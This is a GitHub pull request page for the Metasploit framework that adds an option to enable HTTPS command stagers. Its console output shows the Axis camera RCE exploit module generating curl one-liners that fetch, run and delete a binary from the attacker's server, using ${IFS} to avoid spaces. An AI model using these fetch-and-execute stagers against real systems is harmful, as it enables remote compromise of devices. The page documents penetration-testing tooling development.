Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CMDSTAGER::SSL datastore option #11160

Merged
merged 1 commit into from
Dec 21, 2018
Merged

Add CMDSTAGER::SSL datastore option #11160

merged 1 commit into from
Dec 21, 2018

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Dec 21, 2018
edited
Loading

It has come to my attention that since I added the HTTP(S) command stagers, no one has used HTTPS. This is probably why.

The CmdStager options hash takes precedence over any datastore options, so it was possible to enable SSL/TLS command stagers in code, just not in the console. This corrects that.

  • Add something like CMDSTAGER::SSLVERIFY?
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl
cmdstager::ssl => false
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/hFsBy6j
[*] Local IP: http://192.168.1.3:8080/hFsBy6j
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/KpooVluv${IFS}http://127.0.0.1:8080/hFsBy6j;chmod${IFS}+x${IFS}/tmp/KpooVluv;/tmp/KpooVluv;rm${IFS}-f${IFS}/tmp/KpooVluv"]
^C[-] Exploit failed [user-interrupt]: Interrupt
[*] Server stopped.
[-] run: Interrupted
msf5 exploit(linux/http/axis_srv_parhand_rce) > set cmdstager::ssl true
cmdstager::ssl => true
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: https://0.0.0.0:8080/i4loX67WE8W9HkZ
[*] Local IP: https://192.168.1.3:8080/i4loX67WE8W9HkZ
[*] Generated command stager: ["curl${IFS}-kso${IFS}/tmp/XWGCoCbc${IFS}https://127.0.0.1:8080/i4loX67WE8W9HkZ;chmod${IFS}+x${IFS}/tmp/XWGCoCbc;/tmp/XWGCoCbc;rm${IFS}-f${IFS}/tmp/XWGCoCbc"]
[*] Command Stager progress - 100.00% done (154/154 bytes)
^C[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/axis_srv_parhand_rce) > edit
msf5 exploit(linux/http/axis_srv_parhand_rce) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
index 540aa59299..a5d36e801a 100644
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_memory
       execute_command(payload.encoded)
     when :linux_dropper
-      execute_cmdstager(flavor: 'curl', nospace: true)
+      execute_cmdstager(flavor: 'curl', nospace: true, ssl: false)
     end
   end

msf5 exploit(linux/http/axis_srv_parhand_rce) > rerun
[*] Reloading module...

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/Esl30G3
[*] Local IP: http://192.168.1.3:8080/Esl30G3
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/ShmfZwQH${IFS}http://127.0.0.1:8080/Esl30G3;chmod${IFS}+x${IFS}/tmp/ShmfZwQH;/tmp/ShmfZwQH;rm${IFS}-f${IFS}/tmp/ShmfZwQH"]

#11128

@wvu
Add CMDSTAGER::SSL datastore option
b4ff3b5 
It has come to my attention that since I added the HTTP(S) command
stagers, no one has used HTTPS. This is probably why.

The CmdStager options hash takes precedence over any datastore options.
@wvu wvu requested a review from bcoles December 21, 2018 20:57
@busterb busterb self-assigned this Dec 21, 2018
@busterb busterb merged commit b4ff3b5 into rapid7:master Dec 21, 2018
busterb added a commit that referenced this pull request Dec 21, 2018
@busterb
Land #11160, Add CMDSTAGER::SSL datastore option
620c411
@busterb
Copy link
Member

busterb commented Dec 21, 2018
edited by wvu
Loading

Release Notes

This exposes the ability to enable SSL/TLS command stagers via a new datastore option CMDSTAGER::SSL. Previously, developers had to enable the feature in code.

msjenkins-r7 pushed a commit that referenced this pull request Dec 21, 2018
@busterb @msjenkins-r7
Land #11160, Add CMDSTAGER::SSL datastore option
5c90ce5
bcoles
bcoles reviewed Dec 22, 2018
View reviewed changes
Copy link
Contributor

@bcoles bcoles left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Seems legit

@wvu wvu deleted the feature/cmdstager branch December 22, 2018 05:57
@gdavidson-r7 gdavidson-r7 added the rn-enhancement release notes enhancement label Jan 8, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

Assignees

@busterb busterb

Labels
enhancement library rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@wvu @busterb @bcoles @gdavidson-r7